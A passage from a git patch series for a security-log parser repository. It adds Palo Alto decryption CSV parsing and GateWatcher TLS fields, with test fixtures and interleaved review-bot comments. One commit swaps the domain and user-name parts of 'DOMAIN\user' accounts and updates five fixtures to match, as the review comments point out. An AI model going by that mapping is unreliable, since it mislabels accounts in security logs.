Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": 
"eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "example", + "name": "jdoe" + } + } +} \ No newline at end of file From c3dd2fd72690727297bbc75a2af3654af6dac91c Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 19:03:17 +0100 Subject: [PATCH 266/317] fix(PaloAlto): add support for DSV Decryption events --- .../paloalto-ngfw/ingest/parser.yml | 118 ++++++++++++++++++ .../tests/test_decryption_csv.json | 98 +++++++++++++++ 2 files changed, 216 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index c4abfd388..944713355 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
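Review bot: The fixture's input carries `ErrorIndex` `Protocol` and `ErrorMessage` `General TLS protocol error. Received fatal alert DecodeError from server`, yet nothing in the expected output reflects that the TLS session was not successfully inspected; `event.outcome` is `success` only because it is derived from `Action: allow`. Inspection failures and certificate problems are what an analyst filters decryption logs on, so I would map `ErrorMessage` to `error.message` (and `ErrorIndex` to a vendor field such as `paloalto.tls.error_index`, a constructed name) in the parser, which lies outside this hunk, and assert both values here. The fixture also ends without a trailing newline, as do the other new test files in this series.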
@@ -425,6 +425,124 @@ pipeline: - ClusterName delimiter: "," + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - 
DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json new file mode 100644 index 000000000..6a413f53b --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json 
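Review bot: The DECRYPTION column names diverge from the keys used by the JSON representation of the same log (`UUIDforrule` vs `RuleUUID`, `NATSourceIP` vs `NATSource`, `TLS_AUTH` vs `TLSAuth`, `SubjectCommonName` vs `CommonName`), so every ECS mapping written against one spelling silently drops the value for the other; test_decryption_csv.json in the next hunk has `25185364-4f1b-46b5-a376-a96a9438d665` in the `UUIDforrule` position but its expected output has only `rule.name`, whereas the JSON fixture gets `rule.uuid`. Where a column denotes the same thing as a JSON key I would reuse the JSON name (e.g. `- RuleUUID`) so the mappings elsewhere in parser.yml pick it up, or else add `or` fallbacks in those mappings. `FUTURE_USE` is listed twice here as in the HIPMATCH list, so the two positions collapse onto one key. The 107 names do appear to match the 107 fields of the fixture message, including the quoted `ApplicationCharacteristic` value that contains commas.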
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", 
+ "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From 84cf60f3488d4312a1f07df55bbcd5eae87e2e30 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:14:17 +0100 Subject: [PATCH 267/317] fix(GateWatcher): lint taxonomy --- GateWatcher/aioniq/_meta/fields.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 07bae26e7..8bc01d294 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml 
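Review bot: The expected `@timestamp` `2024-11-03T19:09:43Z` appears to take the local `GenerateTime` as if it were UTC, while the only offset-bearing field in the message, `2024-11-03T19:09:43.654+01:00`, places the event at 18:09:43.654Z; the HIPMATCH CSV fixture from the previous commit resolves the same kind of field to UTC (`2024-11-03T17:50:04.310000Z` from `18:50:04.310+01:00`). A one-hour skew on decryption events breaks correlation with the other PAN-OS log types from the same firewall. The timestamp stage is outside this hunk, but if it can prefer `HighResTimestamp` when present this fixture should assert `"@timestamp": "2024-11-03T18:09:43.654000Z"` (value constructed from the fixture message).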
@@ -389,16 +389,16 @@ gatewatcher.tls: name: gatewatcher.tls type: text -gatewatcher.tls_sni: - description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls_sni - type: text - gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata name: gatewatcher.tls_fingerprint type: text +gatewatcher.tls_sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls_sni + type: text + gatewatcher.ttp: description: This field is used for retrohunt alerts name: gatewatcher.ttp From 941d5826e98ca34ac5c66d22b6e2235eafbdf8b6 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:28:16 +0100 Subject: [PATCH 268/317] test(GateWatcher): Improve support of tls events --- GateWatcher/aioniq/ingest/parser.yml | 1 + GateWatcher/aioniq/tests/sigflow-tls.json | 68 +++++++++++++++++++++++ 2 files changed, 69 insertions(+) create mode 100644 GateWatcher/aioniq/tests/sigflow-tls.json diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 3cc13d747..869a7f8f3 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -215,3 +215,4 @@ stages: gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" tls.version: "{{json_load.message.tls.version}}" tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" diff --git a/GateWatcher/aioniq/tests/sigflow-tls.json b/GateWatcher/aioniq/tests/sigflow-tls.json new file mode 100644 index 000000000..ff8624608 --- /dev/null +++ b/GateWatcher/aioniq/tests/sigflow-tls.json 
@@ -0,0 +1,68 @@ +{ + "input": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ v102", + "dialect_uuid": "bba2bed2-d925-440f-a0ce-dbcae04eaf26" + } + } + }, + "expected": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "event": { + "category": [ + "network" + ], + "module": "tls" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "gatewatcher": { + "event_type": "tls", + "flow_id": "1366008699485799", 
+ "gcap": "gcap-xxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "timestamp_analyzed": "2024-11-21T13:02:44.291Z", + "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}", + "tls_sni": "www.microsoft.com", + "type": "suricata" + }, + "network": { + "transport": "TCP" + }, + "observer": { + "hostname": "gcap-xxxxxxxxx.domain.local", + "mac": [ + "82:df:ee:4f:81:af", + "e6:43:7e:91:1b:92" + ], + "name": "gcap-xxxxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "hosts": [ + "gcap-xxxxxxxxx.domain.local" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 64809 + }, + "tls": { + "server": { + "ja3s": "15af977ce25de452b96affa2addb1036" + }, + "version": "TLS 1.3" + } + } +} \ No newline at end of file From bd97efb6cdc757fa14e48c692ee1cdcfdc568f23 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:33:23 +0100 Subject: [PATCH 269/317] fix(GateWatcher): lint parser --- GateWatcher/aioniq/ingest/parser.yml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 869a7f8f3..845abe396 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml 
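Review bot: The expected `gatewatcher.tls` value is the entire `tls` object re-serialized as a JSON string, with its keys reordered (`ja3s`, `sni`, `version`) relative to the input, so the fixture pins the serializer's key ordering and quoting rather than any property of the event, and the field itself is double-encoded JSON that cannot be queried as structured data. The mapping `gatewatcher.tls: "{{json_load.message.tls}}"` predates this commit (it appears as context in the lint hunk that follows), so the fix belongs in the parser, but this fixture is where the brittleness is locked in; I would either drop that key from the assertion or map the members individually, as `tls.server.ja3s` now is. Separately, `tls.version` is asserted as `TLS 1.3` whereas the Palo Alto parser in this same series normalizes the value to `1.3`; cross-intake searches on `tls.version` will miss one of the two unless the GateWatcher mapping strips the `TLS ` prefix.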
@@ -206,13 +206,13 @@ stages: tls: actions: - set: - tls.server.issuer: "{{json_load.message.tls.issuerdn}}" - tls.server.not_before: "{{json_load.message.tls.notbefore}}" - tls.server.certificate_chain: "{{json_load.message.tls.chain}}" - tls.server.subject: "{{json_load.message.tls.subject}}" - gatewatcher.tls: "{{json_load.message.tls}}" - gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" - gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" - tls.version: "{{json_load.message.tls.version}}" - tls.server.not_after: "{{json_load.message.tls.notafter}}" - tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" From e80062d46eef52b2721efe3f4b17c0a01dace43b Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:45:07 +0100 Subject: [PATCH 270/317] chore(PAloaAlto): name some columns --- .../paloalto-prisma-access/ingest/parser.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 113ef7fdb..7c7de00b8 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type 
@@ -187,12 +187,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
@@ -235,12 +235,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
From 838a83c453d43ea013f72192a71ffd3350af2fba Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Thu, 21 Nov 2024 17:46:41 +0100
Subject: [PATCH 271/317] fix(PaloAlto): fix the definition of the user properties
---
 .../paloalto-prisma-access/ingest/parser.yml | 4 ++--
 .../paloalto-prisma-access/tests/decryption_cef.json | 5 +++--
 .../paloalto-prisma-access/tests/fix_bug_with_int.json | 5 +++--
 .../paloalto-prisma-access/tests/globalprotect_csv_2.json | 5 +++--
 .../paloalto-prisma-access/tests/test_globalprotect.json | 7 ++++---
 .../paloalto-prisma-access/tests/test_userid.json | 6 +++---
 6 files changed, 18 insertions(+), 14 deletions(-)
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 7c7de00b8..84514974e 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -798,8 +798,8 @@ stages:
 set_finalize_user_name:
 actions:
 - set:
- user.domain: '{{final.user.name.split("\\") | first}}'
- user.name: '{{final.user.name.split("\\") | last}}'
+ user.domain: '{{final.user.name.split("\\") | last}}'
+ user.name: '{{final.user.name.split("\\") | first}}'
 filter: '{{final.user.name != null and "\\" in final.user.name}}'
 - set:
 user.domain: '{{final.user.email.split("@") | first}}'
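Review bot: Swapping `first`/`last` in the `@@ -798` hunk puts the part after the backslash into `user.domain` and the part before it into `user.name`, which inverts the down-level `DOMAIN\user` form in which Windows and PAN-OS User-ID report accounts. The updated fixtures show the effect: fix_bug_with_int.json now expects `"domain": "pusername"` and `"name": "domain"`, decryption_cef.json expects `"name": "paloaltonetwork"`, and in test_userid.json `related.user` loses `JDOE` for `test.fr`, so a pivot on the account name across decryption_cef.json, fix_bug_with_int.json, globalprotect_csv_2.json, test_globalprotect.json and test_userid.json would now match the domain instead. Unless the raw SourceUser values in these fixtures really are `user\domain`, the removed lines `user.domain: '{{final.user.name.split("\\") | first}}'` and `user.name: '{{final.user.name.split("\\") | last}}'` were correct and the fixture changes should be reverted with them. The `@` branch visible as the hunk's last context line has the same orientation problem (`user.domain` takes the local part of the address), which test_hipmatch_json.json in the next commit pins as `"domain": "jdoe"`, `"name": "example.org"`.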
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json index 1a4fba4b4..b32ea4d13 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json @@ -69,6 +69,7 @@ "1.1.1.1" ], "user": [ + "paloaltonetwork", "xxxxx" ] }, @@ -90,8 +91,8 @@ } }, "user": { - "domain": "paloaltonetwork", - "name": "xxxxx" + "domain": "xxxxx", + "name": "paloaltonetwork" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json index 512ae89e7..37c8000b9 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json @@ -62,6 +62,7 @@ "5.6.7.8" ], "user": [ + "domain", "pusername", "userdest" ] @@ -86,8 +87,8 @@ } }, "user": { - "domain": "domain", - "name": "pusername" + "domain": "pusername", + "name": "domain" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json index e4b1d5fab..e0cb016eb 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json @@ -46,6 +46,7 @@ "88.120.236.74" ], "user": [ + "example.org", "test" ] }, @@ -61,8 +62,8 @@ } }, "user": { - "domain": "example.org", - "name": "test" + "domain": "test", + "name": "example.org" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json index f08a677ef..5cc8690a2 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json 
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json @@ -49,7 +49,8 @@ "1.2.3.4" ], "user": [ - "JDOE" + "JDOE", + "test.fr" ] }, "source": { @@ -64,8 +65,8 @@ } }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json index dee27d0e1..48cbcdca5 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json @@ -44,7 +44,7 @@ "1.2.3.4" ], "user": [ - "JDOE" + "test.fr" ] }, "source": { @@ -53,8 +53,8 @@ "port": 0 }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" } } } \ No newline at end of file From 497fb289a176e5b2a21ed5e52b294cc18afd8120 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:47:10 +0100 Subject: [PATCH 272/317] test(PaloAlto): add test for hipmatch event in json representation --- .../tests/test_hipmatch_json.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json new file mode 100644 index 000000000..45f8d34f8 --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json 
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
